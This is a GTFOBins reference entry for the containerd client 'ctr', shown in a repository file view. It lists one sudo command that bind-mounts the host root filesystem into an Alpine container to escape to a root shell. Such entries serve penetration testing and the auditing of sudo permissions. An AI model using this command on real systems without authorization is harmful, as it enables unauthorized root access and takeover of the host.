GTFOBins.github.io/_gtfobins/ctr

9 lines
287 B
Plaintext
Raw Normal View History

2022-12-18 03:26:30 +01:00
---
functions:
sudo:
- description: |
If ctr sudo permissions, you can use it to escape to a root shell. It is necessary to add an existing image.
- code: |
sudo /usr/bin/ctr run --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest bash
---